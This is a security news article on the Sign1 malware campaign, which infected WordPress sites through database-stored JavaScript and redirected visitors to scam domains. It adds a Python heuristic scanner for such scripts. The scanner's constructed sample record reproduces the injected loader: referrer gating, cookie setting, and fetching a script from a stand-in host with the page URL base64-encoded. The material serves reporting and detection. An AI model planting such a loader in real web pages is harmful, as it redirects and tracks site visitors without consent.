39,000 Websites Infected in ‘Sign1’ Malware Campaign

Over 39,000 websites have been infected with the Sign1 malware that redirects visitors to scam domains.

More than 39,000 websites have been infected with a new malware family that redirects visitors to scam domains and displays unwanted ads, website security firm Sucuri warns.

Dubbed Sign1, the JavaScript malware was found inside WordPress custom HTML widgets or within the Simple Custom CSS and JS WordPress plugin that the attackers added to the compromised websites.

“Using this method, hackers infect websites without placing any malicious code into server files which allows the malware to stay unnoticed for a long time — as it’s much more common for security providers to scan website files for malware than to check in the database,” Sucuri says.

The injected code changes the URL executed in the victim’s browser every 10 minutes, leading to unwanted redirects to VexTrio domains.

The malware, however, uses obfuscation to hide its presence and executes only if the visitor arrives from a major website, such as Facebook, Google, Instagram, or Yahoo.

“This is a common trait of malware as it tends to allow the infection to stay unnoticed for a longer time (normally a website owner will navigate to their website directly, rather than through a search engine),” Sucuri notes.

The security firm also discovered that the JavaScript code sets a specific cookie so that it would not detonate and display the unwanted pop-up multiple times for the same visitor.

Furthermore, execution is conditioned on the existence of a hexadecimal-string JavaScript file matching a specific 10-minute interval.

“If these conditions are met, then the malware is injected and executes yet another script passing the URL of the current page, the referrer, and the browser language as a base64-encoded parameter. This script works as a TDS and redirects users further to malicious sites (usually the VexTrio scam sites),” Sucuri says.
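As an added example (not Sucuri’s tooling or code from the article), the Python heuristics below score JavaScript stored in the WordPress database for the traits described above: referrer gating on major sites, a cookie to avoid repeat pop-ups, a 10-minute time bucket for the rotating script URL, dynamic script loading, and base64-encoded parameters. The regexes and weights are assumptions modelling that description rather than published signatures, and the sample records are constructed.

```python
"""Heuristic review of JavaScript stored in the WordPress database (custom HTML
widgets, Simple Custom CSS and JS plugin entries) for the traits the article
attributes to Sign1. Added example; patterns are assumptions, samples constructed."""
import re
from dataclasses import dataclass

# (trait name, regex, weight). Weights are assumptions, not published signatures.
TRAITS = [
    ("referrer_check", re.compile(r"document\.referrer"), 2),
    ("major_referrers", re.compile(r"(?:facebook|google|instagram|yahoo)[^\n]*?(?:facebook|google|instagram|yahoo)", re.I), 2),
    # 10-minute bucketing: dividing a ms timestamp by 600000 is one way to express it (assumption)
    ("time_bucket", re.compile(r"(?:Date\.now\(\)|getTime\(\))\s*/\s*(?:600000|6e5)"), 3),
    ("cookie_gate", re.compile(r"document\.cookie\s*="), 1),
    ("base64_param", re.compile(r"\bbtoa\s*\("), 2),
    ("dynamic_script", re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)"), 2),
]
THRESHOLD = 6  # assumption: tune against your own site's legitimate widgets

@dataclass
class Finding:
    record_id: str
    score: int
    traits: list

def score_record(record_id: str, js: str) -> Finding:
    """Score one stored script; 0 means none of the modelled traits matched."""
    hits = [(name, w) for name, rx, w in TRAITS if rx.search(js)]
    return Finding(record_id, sum(w for _, w in hits), [n for n, _ in hits])

def scan(records: dict) -> list:
    """records maps a DB record id (e.g. wp_options name or post id) to its script.
    Returns findings at or above THRESHOLD, highest score first."""
    findings = (score_record(rid, js) for rid, js in records.items())
    return sorted((f for f in findings if f.score >= THRESHOLD), key=lambda f: -f.score)

# Constructed records: a benign analytics widget and one mimicking the described traits
# (example.invalid stands in for the attacker host; nothing here resolves).
SAMPLE_RECORDS = {
    "widget_custom_html-2": "window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments);}",
    "custom-css-js:41": (
        "if(/facebook|google|instagram|yahoo/i.test(document.referrer)&&document.cookie.indexOf('seen')<0){"
        "document.cookie='seen=1';var t=Math.floor(Date.now()/600000);"
        "var s=document.createElement('script');s.src='//example.invalid/'+t.toString(16)+'.js?'+btoa(location.href);"
        "document.head.appendChild(s);}"
    ),
}

if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"{f.record_id}: score {f.score}, traits {', '.join(f.traits)}")
```

Run it against an export of `wp_options` and the plugin’s stored entries rather than the file system, since the article’s point is that the payload lives in the database.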

Over the past six months, the security firm identified over 39,000 sites infected with different variants of the malware, with the most recent variant infecting more than 2,500 sites in the past two months.

Sucuri identified 15 domains used in this malicious campaign. Eight of them have been used in thousands of infections each.


Written By

Ionut Arghire is an international correspondent for SecurityWeek.